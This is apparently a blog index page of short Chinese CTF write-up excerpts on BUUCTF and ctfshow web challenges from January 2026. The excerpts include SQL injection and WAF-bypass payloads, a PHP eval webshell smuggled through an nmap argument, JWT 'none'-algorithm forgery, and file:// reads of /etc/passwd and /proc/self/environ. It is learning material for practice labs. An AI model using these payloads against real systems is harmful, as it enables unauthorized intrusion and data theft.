2026年1月31日

BUU-[CISCN 2019 初赛]Love Math

摘要: preg_match_all()函数 . 真实的执行逻辑:指针移动 preg_match_all 不会修改你的原字符串 $content。它的逻辑是这样的: 初始状态:指针指向字符串的开头(位置 0)。 寻找匹配:从指针位置开始往后找,直到发现符合正则的内容。 捕获内容:一旦匹配成功(比如抓到了 e 阅读全文

posted @ 2026-01-31 21:20 misaki%20mei 阅读(2) 评论(0) 推荐(0)

2026年1月30日

BUU-[SWPU2019]Web1

摘要: 无列名查询 (select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)x) =>解析 union查询的特点: 1. 要求两 阅读全文

posted @ 2026-01-30 22:03 misaki%20mei 阅读(3) 评论(0) 推荐(0)

2026年1月28日

BUU-[GXYCTF2019]禁止套娃

摘要: 强烈推荐: 讲的非常直白 我的笔记: payload: highlight_file(next(array_reverse(scandir(current(localeconv()))))) <?php //var_dump( highlight_file(next(array_reverse(sc 阅读全文

posted @ 2026-01-28 00:00 misaki%20mei 阅读(6) 评论(0) 推荐(0)

2026年1月27日

BUU-[BUUCTF 2018]Online Tool

摘要: //escapeshellarg()函数的处理流程, 为单引号转义,并且使用单引号包围;而且会为目标前后添加一对单引号 //' <?php eval($_GET[pass]); -oG shell.php ' 原始payload //''\'' <?php eval($_GET[pass]); -o 阅读全文

posted @ 2026-01-27 13:32 misaki%20mei 阅读(2) 评论(0) 推荐(0)

2026年1月26日

BUU-[BJDCTF2020]ZJCTF,不过如此

摘要: //next.php <?php $id = $_GET['id']; $_SESSION['id'] = $id; function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")' 阅读全文

posted @ 2026-01-26 20:52 misaki%20mei 阅读(1) 评论(0) 推荐(0)

2026年1月16日

ctfshow-堆叠注入写Shell

摘要: 看答案做了一下笔记 select * from account where username='' and password='' 单引号被禁用 username= password=; select 0x3c3f706870206576616c28245f504f53545b315d293b3f3 阅读全文

posted @ 2026-01-16 20:48 misaki%20mei 阅读(11) 评论(0) 推荐(0)

ctfshow-JWT令牌伪造

摘要: JWT的格式: JWTnone攻击的具体操作: "alg":"none" JWT的格式要求: base64URL风格: 要求末尾的=填充字符要删除 把+替换为- 把/替换为_ 阅读全文

posted @ 2026-01-16 20:23 misaki%20mei 阅读(5) 评论(0) 推荐(0)

2026年1月4日

ctf.show-CTF部分-SafePassword

摘要: 这道题目考的是弱比较和PHP的异常处理 其中前者的值是完全可控的, 但是第二个值不是: 会发现我们不知道变量$secret_salt的值, 所以解法就是不进入IF分支语句 当$channelKey的值长度大于64的时候, 进入ELSE分支语句, 经过层层throw, catch, 最后$channe 阅读全文

posted @ 2026-01-04 10:46 misaki%20mei 阅读(5) 评论(0) 推荐(0)

2026年1月2日

ctf.show-WAF绕过

摘要: 经验: 在进行登陆SQL注入的时候, 有限注入username字段 举例说明: payload: ^if(1,sleep(3),0)# 如果注入password, 后端: SELECT * FROM users WHERE username = 'any' AND password = '1'^if 阅读全文

posted @ 2026-01-02 16:52 misaki%20mei 阅读(4) 评论(0) 推荐(0)

ctf.show-Flask_Session伪造

摘要: file伪协议读取一波 file:///etc/passwd 成功 file:///flag 禁止访问 对flag进行URL编码, 依旧禁止访问 尝试伪造session 寻找secret key file:///proc/self/environ 直接拿到了flag, 但是不符合出题者意图, 继续装 阅读全文

posted @ 2026-01-02 11:50 misaki%20mei 阅读(12) 评论(0) 推荐(0)

导航